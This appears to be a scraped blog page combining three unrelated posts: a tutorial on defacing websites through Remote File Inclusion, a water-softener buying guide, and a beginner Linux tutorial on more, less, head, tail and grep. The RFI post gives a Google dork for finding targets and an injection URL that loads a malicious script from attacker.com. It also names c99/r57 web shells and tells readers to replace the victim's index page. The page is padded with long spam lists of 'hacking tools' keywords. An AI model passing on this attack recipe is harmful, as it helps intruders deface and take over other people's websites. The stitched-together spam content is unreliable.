HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Posted by KP-3မိသားစု |

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More information


  1. Pentest Tools Url Fuzzer
  2. Easy Hack Tools
  3. Hacking Tools For Windows
  4. Hacker Tools Linux
  5. Hack Tools For Pc
  6. World No 1 Hacker Software
  7. Hacker Tools Github
  8. Hacker Tools 2019
  9. Growth Hacker Tools
  10. Best Hacking Tools 2020
  11. Hacker Search Tools
  12. Hacking Tools For Windows
  13. Best Hacking Tools 2019
  14. Pentest Reporting Tools
  15. Hack Tool Apk No Root
  16. Pentest Tools For Windows
  17. Hacking Tools For Kali Linux
  18. Pentest Tools Alternative
  19. Hacking Apps
  20. What Is Hacking Tools
  21. Hack And Tools
  22. Hackers Toolbox
  23. Hack Tool Apk No Root
  24. Top Pentest Tools
  25. Hacking Tools Windows
  26. Hacking Tools Download
  27. Pentest Tools Url Fuzzer
  28. Hack Tools Github
  29. Hacker Tools For Ios
  30. How To Install Pentest Tools In Ubuntu
  31. Hacking Tools For Pc
  32. Beginner Hacker Tools
  33. Pentest Tools Online
  34. Pentest Tools Framework
  35. Pentest Tools Port Scanner
  36. Hacking Tools Pc
  37. Hacking Tools Free Download
  38. Hacker Tools Linux
  39. How To Hack
  40. What Are Hacking Tools
  41. How To Make Hacking Tools
  42. Hacking Tools Github
  43. Hack Apps
  44. What Are Hacking Tools
  45. New Hack Tools
  46. Pentest Tools Android
  47. Pentest Tools For Android
  48. Pentest Tools Framework
  49. Termux Hacking Tools 2019
  50. Hacking Tools Free Download
  51. Hacker Tools
  52. Hacker Tools For Mac
  53. Ethical Hacker Tools
  54. Hacking Tools Mac
  55. Pentest Tools Port Scanner
  56. Pentest Tools Tcp Port Scanner
  57. Hacker Tools Windows
  58. Pentest Tools Tcp Port Scanner
  59. Hack Tools Mac
  60. Nsa Hack Tools
  61. Pentest Tools Kali Linux
  62. Hack Tools
  63. Hacking Tools For Windows Free Download
  64. Hacking Tools For Games
  65. Hacking Tools Windows
  66. Hacks And Tools
  67. Best Hacking Tools 2020
  68. Tools For Hacker
  69. Pentest Tools Online
  70. Tools For Hacker
  71. Hacker Search Tools
  72. Hacking Tools For Windows 7
  73. Hacker Tools For Ios
  74. Easy Hack Tools
  75. Underground Hacker Sites
  76. Best Pentesting Tools 2018
  77. Hacking Tools Name
  78. Hak5 Tools
  79. Hack Tools
  80. Best Pentesting Tools 2018
  81. Hacker Tools Github
  82. Install Pentest Tools Ubuntu
  83. Hack Tools Mac
  84. Tools For Hacker
  85. Hacker Tools List
  86. Hacker Tools 2020
  87. Black Hat Hacker Tools
  88. Pentest Tools
  89. Nsa Hack Tools Download
  90. Pentest Tools Tcp Port Scanner
  91. Usb Pentest Tools
  92. Pentest Tools Github
  93. Hacking Tools Github
  94. Pentest Tools Tcp Port Scanner
  95. Install Pentest Tools Ubuntu
  96. Pentest Tools Website Vulnerability
  97. How To Install Pentest Tools In Ubuntu
  98. Pentest Tools For Android
  99. Nsa Hack Tools Download
  100. Hacking Tools 2019
  101. Pentest Tools Port Scanner
  102. Hack Tools 2019
  103. Hack Tools For Windows

Water Softener for Well Water: A Comprehensive Guide

Posted by KP-3မိသားစု |

What is a Water Softener and How Does it Work?

A water softener is a device that removes hardness from water, typically by exchanging calcium and magnesium ions for sodium ions. This process, known as ion exchange, occurs within a resin bed, which is composed of small, porous beads made of a material called ion-exchange resin.

Why is a Water Softener Needed for Well Water?

Well water often contains high levels of dissolved minerals, including calcium and magnesium, which cause hardness. Hard water can create several problems, such as:

  1. Scale Buildup: Hard water can cause scale buildup in pipes, appliances, and fixtures, reducing their efficiency and lifespan.
  2. Soap Scum: Hard water can make it difficult to create a lather with soap, resulting in soap scum buildup on surfaces.
  3. Dry Skin and Hair: Hard water can strip away natural oils from skin and hair, leading to dryness and irritation.
  4. Reduced Detergent Effectiveness: Hard water can reduce the effectiveness of detergents, making it harder to clean clothes and dishes.
How to Choose the Right Water Softener for Well Water:
  1. Water Hardness Level: The first step in choosing a water softener is to determine the hardness level of your well water. There are several ways to do this, including purchasing a water test kit or sending a sample of your water to a laboratory for analysis.
  2. Flow Rate: Consider the flow rate of your well water system when selecting a water softener. The flow rate is measured in gallons per minute (GPM) and determines the size of the water softener you need.
  3. Grain Capacity: The grain capacity of a water softener refers to its ability to remove hardness from water. The grain capacity is measured in kilograins (KGR) and determines how much hardness the water softener can remove before it needs to be regenerated.
  4. Type of Water Softener: There are two main types of water softeners: salt-based and salt-free. Salt-based water softeners use a process called ion exchange to remove hardness from water, while salt-free water softeners use a different process, such as template-assisted crystallization.
  5. Brand and Reputation: Consider the brand and reputation of the water softener manufacturer when making a purchase. Look for brands that are known for their quality, reliability, and customer service.
How to Install and Maintain a Water Softener for Well Water:
  1. Proper Installation: It is important to have a water softener installed by a qualified professional. Improper installation can lead to leaks, damage to the water softener, or ineffective water softening.
  2. Regular Regeneration: Water softeners need to be regenerated regularly to maintain their effectiveness. The frequency of regeneration depends on the hardness of your water and the size of the water softener.
  3. Salt Replenishment: Salt-based water softeners require regular replenishment of the salt supply. The frequency of replenishment depends on the hardness of your water and the size of the water softener.
  4. Maintenance: Water softeners should be inspected and maintained regularly to ensure proper operation and longevity. This may include cleaning the resin bed, checking for leaks, and replacing any worn or damaged parts.
Benefits of Using a Water Softener for Well Water:
  1. Improved Water Quality: Treated water has a reduced mineral content, improving the taste, smell, and appearance of the water.
  2. Reduced Scale Buildup: This can save you money by extending the lifespan of your appliances.
  3. Softer Skin and Hair: Softened water can help to improve the health of your skin and hair.
  4. More Effective Laundry and Dishwashing: Softened water can improve the performance of detergents and soaps.
  5. Increased Energy Efficiency: Softened water can help to improve the efficiency of water heaters and other appliances that use water.
Conclusion:

A water softener can be a valuable investment for well water users, providing numerous benefits and improving overall water quality. By choosing the right water softener and properly installing and maintaining it, you can enjoy the advantages of softened water throughout your home.

--
You received this message because you are subscribed to the Google Groups "Broadcaster" group.
To unsubscribe from this group and stop receiving emails from it, send an email to broadcaster-news+unsubscribe@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/broadcaster-news/9aa09de1-81fa-4c7e-ad67-17431e4b7165n%40googlegroups.com.

Linux Command Line Hackery Series - Part 4

Posted by KP-3မိသားစု |




Welcome back to Linux Command Line Hackery, hope you have enjoyed this series so far. Today we are going to learn new Linux commands and get comfortable with reading text files on Linux.

Suppose that you wanted to view your /etc/passwd file. How will you do that? From what we have learned so far what you'll do is type:

cat /etc/passwd

And there you go, but really did you see all the output in one terminal? No, you just ended up with last few lines and you'll have to cheat (i,e use graphical scroll bar) in order to see all the contents of /etc/passwd file. So is there a command line tool in linux with which we can see all the contents of a file easily without cheating? Yes, there are actually a few of them and in this article we'll look at some common ones.

Command: more
Syntax:  more [options] file...
Function: more is a filter for paging through text one screenful at a time. With more we can parse a file one terminal at a time or line by line. We can also go backward and forward a number of lines using more.

So if we're to use more on /etc/passwd file how will we do that? We'll simply type

more /etc/passwd

now we'll get a screenful output of the file and have a prompt at the bottom of terminal. In order to move forward one line at a time press <Enter Key>. Using enter we can scroll through the file one line at a time. If you want to move one screen at a time, you can press <Space Key> to move one screen at a time. There are more functions of more program, you can know about them by pressing <h key>. To exit out of more program simply type <q key> and you'll get out of more program.

Command: less
Syntax: less [options] file...
Function: less is similar to more but less has more functionality than more. less is particularly useful when reading large files as less does not have to read the entire input file before starting, so it starts up quickly than many other editors.

less command is based on more so what you've done above with more can be done with less as well. Try it out yourself.

Command: head
Syntax: head [OPTION]... [FILE]...
Function: head command prints the head or first part of a file. By default head prints out first 10 lines of a file. If more than one file is specified, head prints first 10 lines of all files as a default behavior.

If we want to see only first 10 lines of /etc/passwd we can type:

head /etc/passwd

We can also specify to head how many lines we want to view by using the -n flag. Suppose you want to see first 15 lines of /etc/passwd file you've to type:

head -n 15 /etc/passwd

Ok you can view the first lines of a file what about last lines, is there a tool for that also? Exactly that's what our next command will be about.

Command: tail
Syntax: tail [OPTION]... [FILE]...
Function: tail is opposite of head. It prints the last 10 lines of a file by default. And if more than one file is specified, tail prints last 10 lines of all files by default.

To view last 10 lines of /etc/passwd file you'll type:

tail /etc/passwd

and as is the case with head -n flag can be used to specify the number of lines

tail -n 15 /etc/passwd

Now one more thing that we're going to learn today is grep.

Command: grep
Syntax: grep [OPTIONS] PATTERN [FILE...]
Function: grep is used to search a file for lines matching the pattern specified in the command.

A PATTERN can simply be a word like "hello" or it can be a regular expression (in geek speak regex). If you aren't familiar with regex, it's ok we'll not dive into that it's a very big topic but if you want to learn about it I'll add a link at the end of this article that will help you get started with regex.

Now back to grep say we want to find a line in /etc/passwd file which contains my user if we'll simply type:

grep myusername /etc/passwd

Wohoo! It gives out just that data that we're looking for. Remember here myusername is your username.
One cool flag of grep is -v which is used to look in file for every line except the line containing the PATTERN specified after -v [it's lowercase v].

Take your time practicing with these commands especially grep and more. We'll learn a lot more about grep in other upcoming articles.

References:
https://en.wikipedia.org/wiki/Regular_expression
http://www.regular-expressions.info/
Awesome website to learn Regular expressions - http://www.regexr.com/

Related posts


  1. Hacker Search Tools
  2. How To Hack
  3. Pentest Tools Alternative
  4. Nsa Hack Tools
  5. Hack Tools Github
  6. Hacker Search Tools
  7. Hacking Tools 2020
  8. Hacker Security Tools
  9. Hacking Tools Windows
  10. Pentest Tools
  11. Hacker Tools List
  12. Hacker Tools For Windows
  13. Black Hat Hacker Tools
  14. Hack Tools For Windows
  15. Pentest Tools Linux
  16. Beginner Hacker Tools
  17. Nsa Hack Tools
  18. Hack Tools Download
  19. Usb Pentest Tools
  20. Free Pentest Tools For Windows
  21. Hack Tools 2019
  22. Easy Hack Tools
  23. Computer Hacker
  24. Pentest Tools Review
  25. Hacker Tools Github
  26. Hacker Hardware Tools
  27. Hack Tools For Mac
  28. Hack Apps
  29. Pentest Tools Kali Linux
  30. World No 1 Hacker Software
  31. Hacker Tool Kit
  32. Best Hacking Tools 2019
  33. Hack Tools For Games
  34. Pentest Tools Alternative
  35. New Hack Tools
  36. New Hacker Tools
  37. Best Hacking Tools 2020
  38. Pentest Tools Website Vulnerability
  39. Hacking Tools Pc
  40. Pentest Tools Android
  41. Termux Hacking Tools 2019
  42. Hacker
  43. Hack Apps
  44. Hack Tools 2019
  45. Pentest Tools For Windows
  46. Top Pentest Tools
  47. Hacker Tools Online
  48. Hacking Tools Mac
  49. Hack Tool Apk No Root
  50. Hack Tools For Mac
  51. Pentest Tools Website
  52. Hack Tools Pc
  53. Pentest Tools Nmap
  54. Pentest Tools Linux
  55. Pentest Tools For Android
  56. Hack Website Online Tool
  57. Hack Tools For Windows
  58. Underground Hacker Sites
  59. Hacker Techniques Tools And Incident Handling
  60. Hacking Tools Pc
  61. Hacker Tools Software
  62. Tools For Hacker
  63. Hacking Tools Github
  64. Hacking Tools 2020
  65. Hacking Tools Mac
  66. What Is Hacking Tools
  67. Hack Tools
  68. Pentest Recon Tools
  69. Hacking Tools For Windows 7
  70. Hacking Tools Download
  71. Hacker Tools For Windows
  72. Hacker
  73. Hacking Tools Software
  74. Hack Tools Download
  75. Nsa Hack Tools Download
  76. How To Hack
  77. Hack Tool Apk No Root
  78. Hack Tools For Mac
  79. Hack Rom Tools
  80. Hacking Tools Windows 10
  81. Hacker Tools
  82. Hacker Tools Linux
  83. Hacking Tools 2019
  84. How To Make Hacking Tools
  85. Hacker Tools 2019
  86. Hacker Tools Apk Download
  87. Hack Tools Github
  88. Pentest Tools Free
  89. Nsa Hacker Tools
  90. Hack Tools Mac
  91. Hacking Tools For Kali Linux
  92. Pentest Tools Android
  93. Hacker Tools 2020
  94. Hack Tools For Ubuntu
  95. Pentest Tools Review
  96. Hack Tools
  97. Hacking Tools Free Download
  98. Hack Tools For Mac
  99. Pentest Tools List
  100. Hacking Tools For Pc